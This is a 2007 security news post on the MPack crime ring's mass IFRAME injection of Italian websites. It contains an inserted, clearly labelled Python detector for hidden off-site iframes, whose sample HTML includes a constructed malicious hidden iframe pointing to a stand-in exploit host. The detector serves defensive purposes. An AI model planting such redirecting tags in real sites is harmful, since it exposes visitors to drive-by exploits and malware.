June 18th, 2007

Russian hackers hijack Italian sites to serve exploits

Posted by Ryan Naraine @ 10:45 am

Categories: Apple, Botnets, Browsers, Data theft, Exploit code, Firefox, Hackers, Microsoft, Mozilla, Open source, Passwords, Patch Watch, Pen testing, Responsible disclosure, Rootkits, Spam and Phishing, Spyware and Adware, Symantec, Viruses and Worms, Vulnerability research, Zero-day attacks

Tags: Hacker, Exploit, Attack, Ryan Naraine

The Russian crime ring behind the infamous WebAttacker/MPack exploit toolkit hacked into thousands of Italian Web sites over the weekend and used a one-line snippet of code to redirect surfers to a server rigged with drive-by exploits.

[Screenshot: MPack statistics]

The ongoing attacks, which are reminiscent of the Dolphin Stadium site breach in February, use a malicious IFRAME tag embedded into each hacked site to handle the redirection to the malware-laden server.
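A defender's check for the injection pattern described above, written as an added example (not code from the post or from Trend Micro/Symantec): it parses a page's HTML, collects every IFRAME, and flags those that are both hidden (zero size or CSS-hidden) and point to a host other than the site's own. The sample page, site host and the `exploit-host.invalid` address are all constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes (lower-cased keys)."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_zero(value):
    """True for '0', '0px' etc.; False for '', '640', '100%'."""
    digits = "".join(ch for ch in value if ch.isdigit())
    return digits != "" and int(digits) == 0


def suspicious_iframes(html, site_host):
    """Return iframes that are hidden AND load from a foreign host: the shape of
    the one-line redirector injected into the hacked Italian sites."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or site_host  # relative src stays on-site
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = (
            _is_zero(attrs.get("width", "1")) or _is_zero(attrs.get("height", "1"))
            or "display:none" in style or "visibility:hidden" in style
        )
        if hidden and host != site_host:
            findings.append({"src": src, "host": host})
    return findings


# Constructed sample: one legitimate visible embed, one injected hidden
# off-site frame, and one hidden but same-site widget that should not alert.
SAMPLE_HTML = """<html><body><h1>Hotel Bella Vista</h1>
<iframe src="https://video.example-embed.test/e/123" width="640" height="360"></iframe>
<iframe src="http://exploit-host.invalid/in.php" width="0" height="0" style="display: none"></iframe>
<iframe src="/local/widget.html" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in suspicious_iframes(SAMPLE_HTML, "hotel.example"):
        print("hidden off-site iframe ->", hit["src"])
```

The check is a heuristic: an attacker can obscure the tag with script or encoding, so it belongs alongside file-integrity monitoring of the web root rather than in place of it.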

Around midday today, the server hosting the exploits was still live, and anti-virus researchers tracking the attacks had found more than 8,000 hijacked Italian Web sites.

The compromised sites cover a wide range of Internet interests: cars and racing (likely to take advantage of the Formula One weekend), hotels, sports, music, lottery and pornography were all victims. Even Web sites connected to Jon Bon Jovi and Mother Teresa weren't spared, according to virus researchers at Trend Micro.

Here’s a diagram of the attack scenario from Trend Micro’s Carolyn Guevarra:

[Diagram: italian_iframe.gif]

The MPack exploit kit used in these attacks contains a stats counter that spells out in detail the types of exploits used, the number of compromised computers and the types of browsers used by the victims (see screenshot above). In this case, it is clear that some newer exploit modules have been added to take aim at flaws in Firefox, Opera and even Apple's QuickTime media player.

Symantec's Elia Florio provides a glimpse at the statistics:

The list of compromised sites is huge and, from the MPack statistics, this attack is working efficiently (the statistics page reports 65K unique visitors with almost 7K exploited browsers).

It is important to note that the exploits are targeting vulnerabilities that have already been patched, so the best defense is to ensure that your machine is fully patched (OS and the applications running on top of it).

Secunia's free Software Inspector is a nice place to start scanning your machine for weak spots. This tool will detect insecure versions of installed applications, verify that all Microsoft patches are applied and assist you in updating your system and applications.

Ryan Naraine is a journalist and security evangelist at Kaspersky Lab. He manages Threatpost.com, a security news portal. Here is Ryan's full profile and disclosure of his industry affiliations.
